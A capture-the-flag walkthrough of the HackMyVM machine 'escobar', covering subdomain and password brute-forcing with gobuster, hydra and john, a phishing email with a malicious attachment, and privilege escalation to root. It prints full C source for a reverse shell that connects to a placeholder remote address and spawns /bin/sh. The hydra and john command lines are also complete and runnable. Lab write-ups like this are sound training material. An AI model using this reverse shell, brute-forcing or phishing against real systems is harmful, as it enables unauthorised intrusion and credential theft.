Another very interesting VM from HackMyVm, can be download here.
Nmap scan ports.
At port 80, there is a static html page. Bruteforce the folders and files.
There is a squirrelmail site, but we can not login now.
After stuck here for some time, we notice that the VM start screen has some hints.
Add "escobar.hmv" to etc/hosts, and bruteforce the subdomains.
gobuster vhost -u http://escobar.hmv -w /apps/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
We can get another subdomain, then add it to /etc/hosts too.
Open the new address in browser, we get "File Browser" login panel.
We search the internet, and find the project at github, and in doc page, we get the default credentials.
Of cource, the password is not default. We need to bruteforce it with username "admin". Burpsuite to capture the post data of login panel, send to repeater, and click "send" once. Let's check the post data and response.
Now we know, the post data is in json format, and the server reponse of fail is "Forbidden". Then we use hydra to bruteforce. Take care that the special character needs to be escaped(thanks @ch4rm for the help).
hydra -l admin -P /usr/share/wordlists/rockyou.txt management.escobar.hmv http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^","recaptcha"\:""}:Forbidden' -t 64 -fSoon we get the correct password.
Now we can log in the filebrowser. And there are two folders and one file.
In folder "works", there is a logins.xlsx. The name is so interesting, we download it.
When try to open it, need password.
We use john to brute force the password.
python2 /usr/share/john/office2john.py logins.xlsx > logins.hash john --wordlist=/usr/share/wordlists/rockyou.txt logins.hash
Now we can open the xlsx file. There are four email accounts inside the doc, three activated, one deactivated. One more subdomain address "http://elcorreo.escobar.hmx", we add it to /etc/hosts. And a message looks like some kind of hint.
Because the gonzalo is webadmin, we try to log in the squirrelmail with his account. And succeed.
Here comes a trap. Because the squirrelmail's version is 1.4.23, and google says it may have a RCE vulnerability. But after several times of test, at last I fail to get a reverse shell.
Then @ch4rm hint me, maybe I should consider email fishing. After I checked each email's content, I decide to compose a email with subject "new update release", with the secret code in email body, and with a reverse shell in attachment named "update". The email will send to the other two account from the xlsx file.
The reverse shell code is downloaded from internet, and is coded in C.
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX
int main(int argc, char *argv[])
{
struct sockaddr_in sa;
int s;
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
sa.sin_port = htons(REMOTE_PORT);
s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *)&sa, sizeof(sa));
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
execve("/bin/sh", 0, 0);
return 0;
}
Compile it.
After sending the email, wait a few seconds, we get the reverse shell as user "carlos". Now we have user flag.
There are totally three users in home folder. After some enum, I found we can su carlos and gonzalo with the password in the xlsx file, and both of the home folder of these two accounts are readable. Then focus is on user pablo, whose home folder is unreadable now.
If we su pablo with the password in xlsx file directly, we will get "no terminal error".
We need to run the following two cmds to set a TERM variable. The numberof rows and columns depend on the size of your screen.
export TERM=xterm-256color stty rows 120 columns 120
Then we run su pablo again, WOW, the screen is full of strange code like computer virus infection.
After severl seconds, we get this hint screen.
Look like we need to decrypt the sr* code. Hint says VINEGAR. Let's google it.
Click the first site (should be most popular because CTFers likes it). And after some failure, I read the hints again carefully. I think, "aaaa-zzzz" means the alphabet set, and "pablo******" means the correct password starts with this string. That narrows our decryption results. At last, we can get the right one from more than 20 decrypted passwords.
We enter the "real" password, then we log in as pablo.
OK, now sudo -l, and with these two real passwords, we can do anything. Finally we are root.
Thanks for reading till this end. So there is one more clue.
If you have tried to RCE the squirrelmail, with the POC code downloaded from internet, then you will fail to send emails.
In fact, it's because the RCE code change the user's own email address. We need to change it back to original correct one.
